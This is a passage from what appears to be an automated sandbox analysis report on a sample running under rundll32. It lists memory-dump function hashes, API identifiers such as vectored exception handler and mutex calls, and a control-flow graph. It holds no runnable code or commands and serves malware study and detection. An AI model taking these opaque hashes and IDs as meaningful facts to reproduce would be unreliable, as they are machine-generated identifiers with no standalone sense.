        • Opcode Fuzzy Hash: 56b387516ff4cea3dc33e5ee412a7af7dd174eee44575f0d6583827be0e4a923
        • Instruction Fuzzy Hash: 88614F30268B884FE7A4EB19C456BEAF7D5FBC5310F50042DA98EC3291EF74A445C752

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: AddressProcedure
        • String ID:
        • API String ID: 3653107232-0
        • Opcode ID: d22c461c21b557022e48e835735dce800b4ab793d7e9a5f7fefbb0348ab7f62c
        • Instruction ID: 186e3bb9c2cbe84842b8eb7d69a2f825d9b3a85c781b364e200736f4e4115d14
        • Opcode Fuzzy Hash: d22c461c21b557022e48e835735dce800b4ab793d7e9a5f7fefbb0348ab7f62c
        • Instruction Fuzzy Hash: 18318730168B484BD664AA48DC477EAF7E0FB87321F50055DE8CEC3251EA31B4858BD7

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 270 1e8c874a8b0-1e8c874a8d5 RtlAddVectoredExceptionHandler 271 1e8c874a934-1e8c874a93e 270->271 272 1e8c874a8d7-1e8c874a8df 270->272 273 1e8c874a8e1-1e8c874a8e4 272->273 273->271 274 1e8c874a8e6-1e8c874a8e9 273->274 275 1e8c874a92f-1e8c874a932 274->275 276 1e8c874a8eb-1e8c874a8ee 274->276 275->273 276->271 277 1e8c874a8f0-1e8c874a8f3 276->277 277->275 278 1e8c874a8f5-1e8c874a8fe 277->278 280 1e8c874a900-1e8c874a905 278->280 281 1e8c874a919 280->281 282 1e8c874a907-1e8c874a90a 280->282 284 1e8c874a91b-1e8c874a91d 281->284 282->281 283 1e8c874a90c-1e8c874a917 282->283 283->280 284->271 285 1e8c874a91f-1e8c874a92d 284->285 285->284
        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: ExceptionHandlerVectored
        • String ID:
        • API String ID: 3310709589-0
        • Opcode ID: 0bd7b81864e542346ab8d1baffadf97f8142cdd5cb44a6247faf9dbe5d946671
        • Instruction ID: d64e3847971dcbc7fcf82244273000ddc3fbf6a46b1fd4e615fb8ed3bc9dd177
        • Opcode Fuzzy Hash: 0bd7b81864e542346ab8d1baffadf97f8142cdd5cb44a6247faf9dbe5d946671
        • Instruction Fuzzy Hash: B211EB316649A84FEF64B7E8D4CD3EDF2D5E7ED321F760635840ED3140E91998808B60

        Control-flow Graph

        Strings
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 15bd43141e6e56d8e20dd615630e89a0b2474d540f4140bc4154d949e2d90d80
        • Instruction ID: 4a18779aaa9066c6df67ebdd782a5cefc80246a0ca169ec1eeccf5f6addc4330
        • Opcode Fuzzy Hash: 15bd43141e6e56d8e20dd615630e89a0b2474d540f4140bc4154d949e2d90d80
        • Instruction Fuzzy Hash: 78C18670224A488FE794EF2CD4557EAB7E1FB9A311F50051DE84EC32A6EE34E881CB55

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: CreateMutex
        • String ID:
        • API String ID: 1964310414-0
        • Opcode ID: 9c752627e803a0b5411fcc23f35c3cc0402ee579664005442f04e4099f09f16f
        • Instruction ID: 3d30883b87c265fecb4689486578b8532a063e219c4b98c65325c7a01f438c99
        • Opcode Fuzzy Hash: 9c752627e803a0b5411fcc23f35c3cc0402ee579664005442f04e4099f09f16f
        • Instruction Fuzzy Hash: 8BE13C71418A498FE755EF14E885AE6B7F4F769340F20027FE84AC3161EB38E285CB95

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: ExceptionHandlerRemoveVectored
        • String ID:
        • API String ID: 1340492425-0
        • Opcode ID: 963e97afebf6d56f926804c9cb1fcf03c3557f60ee325544a439f7271aa4fe1e
        • Instruction ID: 887dcdcd1af46c0b1f178788ce2bd4dba36b14ca01341e861e5df1bbeddd47d1
        • Opcode Fuzzy Hash: 963e97afebf6d56f926804c9cb1fcf03c3557f60ee325544a439f7271aa4fe1e
        • Instruction Fuzzy Hash: 5211EB302689480BF35CA77CAC1B7FAB6C5E755321F60426EBC0EC35E2FE259C518591

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: ExceptionHandlerRemoveVectored
        • String ID:
        • API String ID: 1340492425-0
        • Opcode ID: a6ae613427cfb71fe0016fb1096c5eb202b7b235033781ae4efbe5c6132115d5
        • Instruction ID: 9618223124142958d1ad8a0ed0aa85c40abea67133c881f31ea67168a6e1caa3
        • Opcode Fuzzy Hash: a6ae613427cfb71fe0016fb1096c5eb202b7b235033781ae4efbe5c6132115d5
        • Instruction Fuzzy Hash: 0F11A7302689080BF35CAB7CAC1B7FAB2C5E755321F60422EBC0EC35E2FD65AC914191